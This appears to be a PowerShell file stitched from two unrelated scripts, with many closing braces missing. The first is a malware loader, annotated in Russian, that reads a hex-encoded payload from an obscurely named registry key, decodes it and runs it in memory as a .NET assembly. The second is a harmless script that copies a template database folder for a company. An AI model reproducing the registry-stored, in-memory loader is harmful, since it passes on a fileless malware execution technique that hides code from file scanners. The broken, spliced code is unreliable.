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function DE0PB([string]$s) {
$H = @()
for ($i = 0; $i -lt $s.Length; $i += 2) {
$H += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber);
return $H;
# функция распарсивает строку записаную hex симвалами по два в байты
$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;
# зачение ключа реестра в $_b
$_b = $_b.replace('Р•', 'E');
# замена в нем Р• на E
[byte[]]$_0 = DE0PB($_b);
# строковое значение распарсивается на байты
$_1 = [System.Threading.Thread]::GetDomain().Load($_0); $_1.EntryPoint.invoke($null, $null);
# тут она запускается )))
a script that creates a folder and copies another folder into it depending on the user's choice
.PARAMETER clearCorpDatabaseDirecoryName
directory name which contains clear Corporate database.
.PARAMETER clearProfDatabaseDirecoryName
directory name which contains clear Professional database.
.PARAMETER clearBasicDatabaseDirecoryName
directory name which contains clear Basic database.
.PARAMETER databaseDirecoryName
Specifies the directory where will be created new directory.
param (
[System.IO.DirectoryInfo]$clearCorpDatabaseDirecoryName = "d:\чистые базы\корп",
[System.IO.DirectoryInfo]$clearProfDatabaseDirecoryName = "d:\чистые базы\проф",
[System.IO.DirectoryInfo]$clearBasicDatabaseDirecoryName = "d:\чистые базы\базовая",
[System.IO.DirectoryInfo]$databaseDirecoryName = "D:\tmp"
enum DatabaseEdition {
corp = 0
prof = 1
basic = 2
try {
[String]$companyName = Read-Host -Prompt "Enter company name"
[DatabaseEdition]$userChoice = Read-Host -Prompt "Select database type 0 - corp, 1 - prof or 2 - basic"
$companyDirectory = New-Item -ItemType Directory -Path (Join-Path $databaseDirecoryName -ChildPath $companyName)
switch ($userChoice){
corp {
Write-Host "User choice corporate"
Copy-Item $clearCorpDatabaseDirecoryName -Destination $companyDirectory.FullName -Recurse
"Directory {0} directory copied to {1}" -f $clearCorpDatabaseDirecoryName, $companyDirectory.FullName
prof {
Write-Host "User choice professional"
Copy-Item $clearProfDatabaseDirecoryName -Destination $companyDirectory.FullName -Recurse
"Directory {0} directory copied to {1}" -f $clearCorpDatabaseDirecoryName, $companyDirectory.FullName
basic {
Write-Host "User choice basic"
Copy-Item $clearBasicDatabaseDirecoryName -Destination $companyDirectory.FullName -Recurse
"Directory {0} directory copied to {1}" -f $clearCorpDatabaseDirecoryName, $companyDirectory.FullName
catch {
Write-Host "An error occurred:"
Write-Host $_